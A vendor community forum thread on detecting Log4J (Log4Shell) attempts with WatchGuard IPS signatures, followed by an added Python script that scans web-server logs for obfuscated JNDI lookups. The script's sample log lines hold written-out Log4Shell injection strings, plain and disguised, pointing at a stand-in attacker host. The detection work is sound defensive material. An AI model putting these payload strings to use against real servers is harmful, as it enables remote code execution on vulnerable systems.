Log4J
Do we have a method of spotting Log4J attempts in watchguard cloud yet?
--
WatchGuard M4800 (x2 Cluster)
WatchGuard M690 (x2 Cluster)
Firmware : 12.10.4
Comments
Hi @Abertay
This will most likely be in the form of an IPS update which should be released soon. If this is the case, you'll be able to search for denies based on that IPS signature.
-James Carson
WatchGuard Customer Support
@Abertay IPS updates are live:
https://techsearch.watchguard.com/KB?type=Security Issues&SFDCID=kA16S000000SNnuSAG&lang=en_US
Signature IDs are in the KB article
-James Carson
WatchGuard Customer Support
Hi James,
Could you clarify the following scenarios in which the IPS signature will work?
a) HTTPS server behind a packet filter rule with IPS enabled
b) HTTPS server behind a proxy filter rule, DPI not enabled and IPS enabled
c) HTTPS server behind a proxy filter rule, DPI enabled and IPS enabled
Just want to ensure that there are no gaps.
Hi @DaveDave
Ideally it'll work the same for all of those policy types, but IPS has the best chance of detecting things with content inspection enabled.
*I am purposely using the term Content Inspection, as that's how it's labeled in the firebox and in our documentation.
a) HTTPS server behind a packet filter rule with IPS enabled
b) HTTPS server behind a proxy filter rule, Content Inspection not enabled and IPS enabled
A and B would behave the same, and IPS will scan traffic based on signature examples. Since the LDAP attack (the attack vector in the vulnerability) has distinct characteristics IPS can usually still detect this.
c) HTTPS server behind a proxy filter rule, Content Inspection enabled and IPS enabled
C would have a better chance of working should differentiations on the attack vector be discovered, since the proxy will have decrypted the actual traffic. Running content inspection also allows Gateway Anti-Virus, Intelligent Anti-Virus, APT, and other scans to take place. I would suggest running proxies with content inspection if at all possible due to these added benefits.
If you're looking for a simpler way to convey it, consider:
-A person in a trench coat
-3 children in a trench coat.
Even though the children are covered by a trench coat, it's still easy to label characteristics that let you spot them. Arms may be too short, they may walk differently, etc.
The children might get better at disguising themselves, so having everyone take their coat off is still the best way to protect against that specific thing.
-James Carson
WatchGuard Customer Support
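The thread describes two ideas: an IPS can match the distinctive JNDI lookup even without decryption if it sees the bytes, and attackers disguise that lookup so a plain pattern eventually stops matching. The following Python script is an added illustration of the second point, not code from the thread or from WatchGuard; it is a log-side check, not a reimplementation of the Firebox IPS signatures. It runs a plain "${jndi:" match and a de-obfuscating match over a few constructed combined-format web-server log lines (hypothetical IPs and hostnames), collapsing the common ${lower:x}, ${upper:x} and ${...:-x} disguises before matching, and reports which hits the plain match would have missed. As the reply above notes, this only works where the traffic is visible in the clear, so for HTTPS it corresponds to the content-inspection case.

```python
"""Spot Log4Shell-style JNDI lookup strings in web-server log lines.

Added example, not part of the original thread or of WatchGuard's product.
It mimics what any content-inspecting detector has to do: undo the common
obfuscations of the ${...} lookup syntax before matching "${jndi:<scheme>:".
The sample log lines below are constructed for this example.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample lines in combined log format (hypothetical hosts/IPs).
# Line 2: plain lookup in the User-Agent.  Line 3: URL-encoded, nested
# ${lower:} disguise in the query string.  Line 4: ${::-x} default-value
# disguise spelling out "jndi" one character at a time.
SAMPLE_LOGS = [
    '10.0.0.5 - - [11/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [11/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - [11/Dec/2021:10:00:03 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3A%24%7Blower%3Al%7Ddap%3A%2F%2Fattacker.example%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.8 - - [11/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://attacker.example/c}"',
    '10.0.0.9 - - [11/Dec/2021:10:00:05 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11)"',
]

# Innermost ${...} expression: a body with no further "${" or "}" inside.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# After de-obfuscation the lookup must literally start with "${jndi:<scheme>:".
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/*([^/}\s]+)", re.IGNORECASE)


def _resolve(m: "re.Match[str]") -> str:
    """Resolve one obfuscation lookup to the text it would produce.

    Handles ${lower:x}, ${upper:x} and the default-value form ${a:b:-x}
    (including the degenerate ${::-x}).  Anything else is left untouched,
    which is what makes the loop in normalize_lookups terminate.
    """
    body = m.group(1)
    head, sep, rest = body.partition(":")
    if sep and head.strip().lower() == "lower":
        return rest.lower()
    if sep and head.strip().lower() == "upper":
        return rest.upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return m.group(0)


def normalize_lookups(text: str, max_rounds: int = 32) -> str:
    """Repeatedly collapse inner obfuscation lookups until nothing changes."""
    for _ in range(max_rounds):
        collapsed = INNERMOST.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per line that carries a JNDI lookup.

    'obfuscated' is True when the raw (URL-decoded) line does not match
    the plain pattern but the normalized one does, i.e. a signature that
    only looks for the literal "${jndi:" would have missed it.
    """
    findings: List[Dict[str, object]] = []
    for number, raw in enumerate(lines, start=1):
        decoded = unquote(raw)  # %24%7B -> ${ ; harmless on plain lines
        naive_hit = JNDI.search(decoded)
        hit = JNDI.search(normalize_lookups(decoded))
        if hit:
            findings.append({
                "line": number,
                "scheme": hit.group(1).lower(),
                "host": hit.group(2),
                "obfuscated": naive_hit is None,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOGS):
        flag = "OBFUSCATED" if f["obfuscated"] else "plain"
        print(f"line {f['line']}: {f['scheme']}://{f['host']} ({flag})")
```

Running it flags lines 2, 3 and 4; the plain match on its own catches only line 2. That gap is the "children getting better at disguising themselves" from the reply above: a literal signature is a starting point, and the de-obfuscation step (or the vendor's updated signatures) is what closes it. Only a handful of disguise forms are handled here, so treat a clean result as "nothing matched these forms", not as proof of absence.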